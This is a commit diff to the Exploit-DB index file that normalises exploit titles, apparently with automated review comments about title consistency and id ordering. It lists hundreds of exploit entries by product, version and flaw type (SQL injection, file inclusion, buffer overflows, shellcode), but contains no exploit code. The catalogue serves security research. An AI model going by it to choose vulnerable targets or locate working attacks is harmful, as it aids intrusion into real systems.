DB: 2016-03-17

5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities

AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
Offensive Security 2016-03-17 07:07:56 +00:00
parent 48534c54b0
commit 477bcbdcc0
7877 changed files with 590387 additions and 589604 deletions


@ -3327,7 +3327,7 @@ id,file,description,date,author,platform,type,port
3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse (site_path) Remote File Inclusion Vulnerability",2007-04-05,kezzap66345,php,webapps,0 3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse (site_path) Remote File Inclusion Vulnerability",2007-04-05,kezzap66345,php,webapps,0
3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 beta - Multiple Remote File Inclusion Vulnerabilities",2007-04-05,bd0rk,php,webapps,0 3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 beta - Multiple Remote File Inclusion Vulnerabilities",2007-04-05,bd0rk,php,webapps,0
3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links <= 1.03 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0 3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links <= 1.03 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0
3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit",2007-04-05,BlackHawk,php,webapps,0 3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities",2007-04-05,BlackHawk,php,webapps,0
3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs <= 2.4 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0 3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs <= 2.4 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0
3673,platforms/php/webapps/3673.txt,"WebSPELL <= 4.01.02 - (picture.php) File Disclosure Vulnerability",2007-04-05,Trex,php,webapps,0 3673,platforms/php/webapps/3673.txt,"WebSPELL <= 4.01.02 - (picture.php) File Disclosure Vulnerability",2007-04-05,Trex,php,webapps,0
3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit",2007-04-05,WiLdBoY,windows,dos,0 3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit",2007-04-05,WiLdBoY,windows,dos,0
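Review bot: The retitling of entry 3671 drops the word "Exploit" ("Multiple Vulnerability Exploit" becomes "Multiple Vulnerabilities"), yet the file is platforms/php/webapps/3671.php, a working exploit script rather than an advisory text; neighbouring entries in this hunk keep "Exploit" in titles that point at .pl or .php files (3670, 3672, 3674), so consider "phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities Exploit" or similar to preserve that distinction while still normalizing the plural.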
@ -10002,7 +10002,7 @@ id,file,description,date,author,platform,type,port
10789,platforms/php/webapps/10789.txt,"Joomla compnent com_noticia Cross-Site scripting",2009-12-29,Mr.tro0oqy,php,webapps,0 10789,platforms/php/webapps/10789.txt,"Joomla compnent com_noticia Cross-Site scripting",2009-12-29,Mr.tro0oqy,php,webapps,0
10790,platforms/php/webapps/10790.txt,"Joomla Component com_kkcontent Blind SQL Injection Vulnerability",2009-12-29,Pyske,php,webapps,0 10790,platforms/php/webapps/10790.txt,"Joomla Component com_kkcontent Blind SQL Injection Vulnerability",2009-12-29,Pyske,php,webapps,0
10791,platforms/windows/remote/10791.py,"Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80 10791,platforms/windows/remote/10791.py,"Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80
10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS Multiple Vulnerability",2009-12-30,emgent,hardware,webapps,80 10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS - Multiple Vulnerabilities",2009-12-30,emgent,hardware,webapps,80
10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion",2009-12-30,"cr4wl3r ",php,webapps,0 10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion",2009-12-30,"cr4wl3r ",php,webapps,0
10794,platforms/asp/webapps/10794.txt,"WEB Calendar Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0 10794,platforms/asp/webapps/10794.txt,"WEB Calendar Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0
10795,platforms/asp/webapps/10795.txt,"ezguestbook Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0 10795,platforms/asp/webapps/10795.txt,"ezguestbook Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0
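Review bot: While normalizing 10792 in this hunk, the unchanged context line for 10789 still carries the typo "Joomla compnent com_noticia Cross-Site scripting" (should read "component" and "Cross-Site Scripting"); since this commit is a title clean-up pass, fixing it here would keep the pass consistent.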
@ -10487,7 +10487,7 @@ id,file,description,date,author,platform,type,port
11449,platforms/php/webapps/11449.txt,"Joomla com_videos Remote SQL Injection Vulnerability",2010-02-14,snakespc,php,webapps,0 11449,platforms/php/webapps/11449.txt,"Joomla com_videos Remote SQL Injection Vulnerability",2010-02-14,snakespc,php,webapps,0
11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3",2010-02-14,ROOT_EGY,php,webapps,0 11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3",2010-02-14,ROOT_EGY,php,webapps,0
11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - (.mp3) Local Denial of Service (DoS) (2)",2010-02-14,Mr.tro0oqy,windows,dos,0 11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - (.mp3) Local Denial of Service (DoS) (2)",2010-02-14,Mr.tro0oqy,windows,dos,0
11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL",2010-02-14,kaMtiEz,php,webapps,0 11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities",2010-02-14,kaMtiEz,php,webapps,0
11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0 11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0
11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0 11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0
11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) SQL Injection Vulnerability",2010-02-15,10n1z3d,php,webapps,0 11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) SQL Injection Vulnerability",2010-02-15,10n1z3d,php,webapps,0
@ -10875,7 +10875,7 @@ id,file,description,date,author,platform,type,port
11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0 11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0
11892,platforms/php/webapps/11892.txt,"post Card (catid) Remote SQL Injection Vulnerability",2010-03-26,"Hussin X",php,webapps,0 11892,platforms/php/webapps/11892.txt,"post Card (catid) Remote SQL Injection Vulnerability",2010-03-26,"Hussin X",php,webapps,0
11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 DoS",2010-03-26,OrderZero,linux,dos,0 11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 DoS",2010-03-26,OrderZero,linux,dos,0
11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability",2010-03-26,eidelweiss,php,webapps,0 11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities",2010-03-26,eidelweiss,php,webapps,0
11895,platforms/php/webapps/11895.txt,"CyberCMS - Remote SQL Injection",2010-03-26,hc0de,php,webapps,0 11895,platforms/php/webapps/11895.txt,"CyberCMS - Remote SQL Injection",2010-03-26,hc0de,php,webapps,0
11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - CSRF Create Administrator Account",2010-03-26,bi0,php,webapps,0 11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - CSRF Create Administrator Account",2010-03-26,bi0,php,webapps,0
11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite (Module Jokes) SQL-Injection Exploit",2010-03-26,Sc0rpi0n,php,webapps,0 11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite (Module Jokes) SQL-Injection Exploit",2010-03-26,Sc0rpi0n,php,webapps,0
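Review bot: Entry 11894 is still titled after the archive filename "cmsfaethon-2.2.0-ultimate.7z" after this change; the retitle only pluralizes "Vulnerabilities". If the goal of the pass is searchable titles, the product name and version that the filename encodes (a 2.2.0 "ultimate" edition of the CMS) would serve better than a .7z filename, which is also inconsistent with every other title in the hunk.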
@ -10978,7 +10978,7 @@ id,file,description,date,author,platform,type,port
12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
12016,platforms/php/webapps/12016.txt,"Joomla Component com_ops SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 12016,platforms/php/webapps/12016.txt,"Joomla Component com_ops SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
12017,platforms/php/webapps/12017.txt,"Joomla Component com_football SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 12017,platforms/php/webapps/12017.txt,"Joomla Component com_football SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)",2010-04-02,eidelweiss,php,webapps,0 12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0
12019,platforms/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion Vulnerability",2010-04-02,"cr4wl3r ",php,webapps,0 12019,platforms/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion Vulnerability",2010-04-02,"cr4wl3r ",php,webapps,0
12021,platforms/php/webapps/12021.txt,"68kb Knowledge Base 1.0.0rc3 - Admin CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0 12021,platforms/php/webapps/12021.txt,"68kb Knowledge Base 1.0.0rc3 - Admin CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base 1.0.0rc3 - Edit Main Settings CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0 12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base 1.0.0rc3 - Edit Main Settings CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
@ -11182,7 +11182,7 @@ id,file,description,date,author,platform,type,port
12239,platforms/php/webapps/12239.txt,"Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0 12239,platforms/php/webapps/12239.txt,"Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0
12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow DoS PoC",2010-04-14,mr_me,windows,dos,0 12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow DoS PoC",2010-04-14,mr_me,windows,dos,0
15732,platforms/linux/dos/15732.txt,"FontForge .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 15732,platforms/linux/dos/15732.txt,"FontForge .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0
12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability",2010-04-14,eidelweiss,php,webapps,0 12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0
12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities",2010-04-14,wsn1983,jsp,webapps,0 12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities",2010-04-14,wsn1983,jsp,webapps,0
12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC",2010-04-14,mr_me,windows,dos,0 12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC",2010-04-14,mr_me,windows,dos,0
12244,platforms/windows/remote/12244.txt,"iMesh <= 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0 12244,platforms/windows/remote/12244.txt,"iMesh <= 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0
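Review bot: The unchanged context in this hunk shows entry 15732 (dated 2010-12-14) sitting between 12240 and 12241, so files.csv is not in id order here; this is not introduced by the retitle of 12241, but any tooling that assumes sorted ids when diffing or merging this CSV will produce noisy hunks like this one, and it is worth fixing in the same clean-up series.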
@ -11233,7 +11233,7 @@ id,file,description,date,author,platform,type,port
12292,platforms/php/webapps/12292.txt,"Flex File Manager Shell Upload Vulnerability",2010-04-19,Mr.MLL,php,webapps,0 12292,platforms/php/webapps/12292.txt,"Flex File Manager Shell Upload Vulnerability",2010-04-19,Mr.MLL,php,webapps,0
12293,platforms/windows/local/12293.py,"TweakFS 1.0 (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0 12293,platforms/windows/local/12293.py,"TweakFS 1.0 (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0
12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) ActiveX Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0 12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) ActiveX Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0
12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability",2010-04-19,eidelweiss,php,webapps,0 12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities",2010-04-19,eidelweiss,php,webapps,0
12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability",2010-04-19,"cr4wl3r ",php,webapps,0 12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability",2010-04-19,"cr4wl3r ",php,webapps,0
12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c Denial of Service and Modem Reset",2010-04-19,hkm,hardware,dos,0 12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c Denial of Service and Modem Reset",2010-04-19,hkm,hardware,dos,0
12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0 12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0
@ -11377,7 +11377,7 @@ id,file,description,date,author,platform,type,port
12460,platforms/php/webapps/12460.txt,"b2b gold script - (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0 12460,platforms/php/webapps/12460.txt,"b2b gold script - (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0
12461,platforms/php/webapps/12461.txt,"JobPost - SQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0 12461,platforms/php/webapps/12461.txt,"JobPost - SQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0
12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0 12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0
12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerability",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0 12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
12464,platforms/asp/webapps/12464.txt,"ASPCode CMS <= 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0 12464,platforms/asp/webapps/12464.txt,"ASPCode CMS <= 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0
12465,platforms/php/webapps/12465.txt,"Joomla Component com_newsfeeds SQL Injection Vulnerability",2010-04-30,Archimonde,php,webapps,0 12465,platforms/php/webapps/12465.txt,"Joomla Component com_newsfeeds SQL Injection Vulnerability",2010-04-30,Archimonde,php,webapps,0
12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion Vulnerability",2010-04-30,eidelweiss,php,webapps,0 12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion Vulnerability",2010-04-30,eidelweiss,php,webapps,0
@ -11587,7 +11587,7 @@ id,file,description,date,author,platform,type,port
12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0 12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit",2010-05-21,Ma3sTr0-Dz,php,webapps,0 12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit",2010-05-21,Ma3sTr0-Dz,php,webapps,0
12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0 12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0
14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0 12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0
12693,platforms/asp/webapps/12693.txt,"Asset Manager Remote File upload Vulnerability",2010-05-22,Ra3cH,asp,webapps,0 12693,platforms/asp/webapps/12693.txt,"Asset Manager Remote File upload Vulnerability",2010-05-22,Ra3cH,asp,webapps,0
12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0 12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0
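Review bot: Entry 12694 ("Tochin Ecommerce Multiple Remote Vulnerability") in this hunk's trailing context has exactly the singular "Multiple ... Vulnerability" form that this commit is normalizing for 14322, but is left untouched; suggest "Tochin Ecommerce - Multiple Remote Vulnerabilities" so the pass does not leave visibly inconsistent neighbours. Note also that 14322 (2010-07-10) is placed between 12691 and 12692, another out-of-order id in this file.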
@ -11626,7 +11626,7 @@ id,file,description,date,author,platform,type,port
12729,platforms/php/webapps/12729.txt,"Blox CMS SQL Injection Vulnerability",2010-05-24,CoBRa_21,php,webapps,0 12729,platforms/php/webapps/12729.txt,"Blox CMS SQL Injection Vulnerability",2010-05-24,CoBRa_21,php,webapps,0
12730,platforms/multiple/webapps/12730.txt,"ProWeb Design SQL Injection Vulnerability",2010-05-24,cyberlog,multiple,webapps,0 12730,platforms/multiple/webapps/12730.txt,"ProWeb Design SQL Injection Vulnerability",2010-05-24,cyberlog,multiple,webapps,0
12731,platforms/php/webapps/12731.txt,"Webloader 8 - SQL Injection Vulnerability",2010-05-24,ByEge,php,webapps,0 12731,platforms/php/webapps/12731.txt,"Webloader 8 - SQL Injection Vulnerability",2010-05-24,ByEge,php,webapps,0
12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability",2010-05-24,eidelweiss,php,webapps,0 12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities",2010-05-24,eidelweiss,php,webapps,0
12734,platforms/asp/webapps/12734.txt,"Blaze Apps Multiple Vulnerabilities",2010-05-24,"AmnPardaz ",asp,webapps,0 12734,platforms/asp/webapps/12734.txt,"Blaze Apps Multiple Vulnerabilities",2010-05-24,"AmnPardaz ",asp,webapps,0
12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery SQL Injection Vulnerability",2010-05-25,cyberlog,php,webapps,0 12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery SQL Injection Vulnerability",2010-05-25,cyberlog,php,webapps,0
12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - (news.php) SQL Injection Vulnerability",2010-05-25,"Dr.SiLnT HilL",php,webapps,0 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - (news.php) SQL Injection Vulnerability",2010-05-25,"Dr.SiLnT HilL",php,webapps,0
@ -12562,7 +12562,7 @@ id,file,description,date,author,platform,type,port
14281,platforms/asp/webapps/14281.txt,"KMSoft GB SQL Injection Vulnerabilty",2010-07-08,SONIC,asp,webapps,0 14281,platforms/asp/webapps/14281.txt,"KMSoft GB SQL Injection Vulnerabilty",2010-07-08,SONIC,asp,webapps,0
14282,platforms/windows/dos/14282.txt,"cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0 14282,platforms/windows/dos/14282.txt,"cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0
14283,platforms/asp/webapps/14283.txt,"ClickGallery Server SQL Injection Vulnerability",2010-07-08,SONIC,asp,webapps,0 14283,platforms/asp/webapps/14283.txt,"ClickGallery Server SQL Injection Vulnerability",2010-07-08,SONIC,asp,webapps,0
14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerability",2010-07-08,SONIC,asp,webapps,0 14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerabilities",2010-07-08,SONIC,asp,webapps,0
14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Exploit with DEP bypass",2010-07-09,dmc,windows,remote,0 14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Exploit with DEP bypass",2010-07-09,dmc,windows,remote,0
14288,platforms/multiple/shellcode/14288.asm,"Write-to-file Shellcode (Win32)",2010-07-09,"Brett Gervasoni",multiple,shellcode,0 14288,platforms/multiple/shellcode/14288.asm,"Write-to-file Shellcode (Win32)",2010-07-09,"Brett Gervasoni",multiple,shellcode,0
14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery [CSRF]",2010-07-09,saudi0hacker,php,webapps,0 14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery [CSRF]",2010-07-09,saudi0hacker,php,webapps,0
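Review bot: Entry 14281 in this hunk's context still reads "KMSoft GB SQL Injection Vulnerabilty" (misspelled "Vulnerability"); the retitle of 14284 touches the same hunk, so correcting the spelling here would cost nothing and is in scope for a title clean-up.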
@ -12587,7 +12587,7 @@ id,file,description,date,author,platform,type,port
14319,platforms/php/webapps/14319.pl,"PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0 14319,platforms/php/webapps/14319.pl,"PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0
14320,platforms/php/webapps/14320.pl,"PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0 14320,platforms/php/webapps/14320.pl,"PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0
14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0
14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact Organizer SQL Injection Vulnerability",2010-07-10,v3n0m,php,webapps,0 14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact Organizer SQL Injection Vulnerability",2010-07-10,v3n0m,php,webapps,0
14327,platforms/php/webapps/14327.txt,"Joomla Rapid Recipe Persistent XSS Vulnerability",2010-07-10,Sid3^effects,php,webapps,0 14327,platforms/php/webapps/14327.txt,"Joomla Rapid Recipe Persistent XSS Vulnerability",2010-07-10,Sid3^effects,php,webapps,0
14328,platforms/php/webapps/14328.html,"Macs CMS 1.1.4 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-11,10n1z3d,php,webapps,0 14328,platforms/php/webapps/14328.html,"Macs CMS 1.1.4 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-11,10n1z3d,php,webapps,0
@ -15550,7 +15550,7 @@ id,file,description,date,author,platform,type,port
17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin <= 1.0.31 - SQL Injection Vulnerability",2011-09-27,"Miroslav Stampar",php,webapps,0 17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin <= 1.0.31 - SQL Injection Vulnerability",2011-09-27,"Miroslav Stampar",php,webapps,0
17895,platforms/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0 17895,platforms/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0
